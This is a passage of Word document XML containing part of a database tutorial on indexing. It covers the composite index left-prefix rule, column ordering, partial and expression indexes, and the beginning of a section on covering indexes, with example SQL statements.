    <w:p w14:paraId="131C3F84" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD6F4A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Not supported (index not used):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27633689" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE order_date &gt; '2024'                        -- skips first column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242FF8A4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE status = 'shipped'                         -- skips first two columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F62815F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE customer_id = 123 AND status = 'shipped'   -- gaps in prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6109F286" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    (customer_id is used, but status can't be reached via index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A9F6CA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The internal reason for the left-prefix rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D83BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The index sorts entries first by customer_id, then by order_date within each customer_id, then by status within each (customer_id, order_date) pair. Scanning for a specific order_date without fixing customer_id would require scanning all customer IDs — a full index scan — defeating the purpose of the index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2863DA21" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Column ordering in composite indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B3F031" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2712573A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Decision factors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A9143B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Equality before range:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4279CBD6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Query: WHERE customer_id = 123 AND order_date &gt; '2024'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558DB79E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Index (customer_id, order_date): efficient — equality on first col, range on second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CA114C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Index (order_date, customer_id): poor — range on first col blocks use of second col</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0675D7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E37BCC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. High cardinality columns first (for equality filters):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10E78D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     customer_id: 1M distinct values (high cardinality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168FC6AC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     status: 5 distinct values (low cardinality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C572AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Index (customer_id, status): better selectivity, smaller scan range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD278C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Index (status, customer_id): each status bucket still has millions of rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72F163" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A34066" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. Sort columns last:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA764D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Query: WHERE customer_id = 123 ORDER BY order_date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C93B5D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Index (customer_id, order_date): can use index for sort (no sort step)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F7655B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Index (order_date, customer_id): sort on customer_id requires separate sort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F83698" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partial Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853134D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A partial index covers only a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subset of rows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — those satisfying a predicate specified at index creation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16183FA6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E9281" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Index only active users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5057387A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON users(email) WHERE status = 'active';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E8373" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="56A5B887" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Index only orders from the last 30 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA50682" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON orders(customer_id, order_date) WHERE order_date &gt; NOW() - INTERVAL '30 days';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF77F8C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="30E4DAED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Index only unprocessed events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AF915C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON events(created_at) WHERE processed = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28685967" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A9C3C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51887F24" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table: users (10 million rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C825DA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  active users: 100,000 (1%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F6D6A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  inactive users: 9,900,000 (99%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722559B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEEC181" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Full index on email: 10M entries, ~800MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B824269" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Partial index on email WHERE status='active': 100K entries, ~8MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3A9A18" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="063696EA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Query: SELECT * FROM users WHERE email = 'alice@example.com' AND status = 'active'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77483CC9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Full index: scan 10M entries, return 0-1 match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2950EA8D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Partial index: scan 100K entries, return 0-1 match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2042DCB2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → 100× smaller index, 100× fewer entries to scan, fits in cache easily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019585A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="275F5DAC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Additional benefit: partial indexes are dramatically smaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10995552" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Higher probability of fitting in buffer pool cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656AE95A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Higher hit rate → fewer disk reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5187153C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Index maintenance (inserts, updates) only touches the index for matching rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46467C15" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     → Only inserts of active users write to the partial index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191310F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     → 1% of inserts touch the partial index instead of 100%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7DA2D4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When partial indexes are the right tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC581C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1489"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Sparse data: a column that is non-null for only 1% of rows. Index only non-null rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D13BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1489"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Hot data: recent orders, unprocessed queue items. Index only the recent/unprocessed subset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B5DAE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1489"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Status-filtered queries: queries always include WHERE status = 'active'. The status predicate is in the index, not needed in the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925A723" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expression (Functional) Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3489DC22" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Standard indexes index column values. Expression indexes index the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>result of an expression applied to column values</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEC5EA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428B7960" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Index lowercase email for case-insensitive search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBC29C5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON users(lower(email));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9B58DC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query must use the same expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACD825" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM users WHERE lower(email) = lower('Alice@Example.com');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ECF6C1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="58C338EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Index extracted year for year-based filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546BF52D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>CREATE INDEX ON orders(EXTRACT(YEAR FROM order_date));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA99CB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM orders WHERE EXTRACT(YEAR FROM order_date) = 2024;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EDB208" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="36D3B46C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Index JSON field for JSON column queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD7311" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON events((payload-&gt;&gt;'event_type'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4393A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM events WHERE payload-&gt;&gt;'event_type' = 'purchase';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C444F31" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="639F04EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Index computed business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D21A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON products((price * (1 - discount_pct)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F512C42" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM products WHERE price * (1 - discount_pct) &lt; 50.00;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781BADF9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE2D08" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The expression is evaluated at index build time and at each insert/update. The result is stored as the index key. The query planner recognizes when a query's WHERE clause matches an indexed expression and uses the expression index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4442643F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> The query must use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exact same expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>. lower(email) and LOWER(email) are the same (case-insensitive function names). But email::citext and lower(email) are different expressions — the latter won't use a lower(email) index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420CA4A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Covering Indexes — Eliminating Heap Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A152D06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>covering index</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> includes all columns referenced in a query — either in the WHERE clause, SELECT list, or ORDER BY clause. The query can be satisfied entirely from the index without accessing the heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D2C47" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C486541" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: SELECT name, email FROM users WHERE age BETWEEN 25 AND 35 ORDER BY name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506130B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3B9624CF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Non-covering: CREATE INDEX ON users(age)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0EF49E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Index provides row pointers for 25 ≤ age ≤ 35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAF596" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → Must fetch heap pages for each matching row (to get name, email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C716E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → If 10,000 rows match: up to 10,000 heap page reads (random I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D85F34" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Must sort by name after fetching</w:t>
      </w:r>
    </w:p>
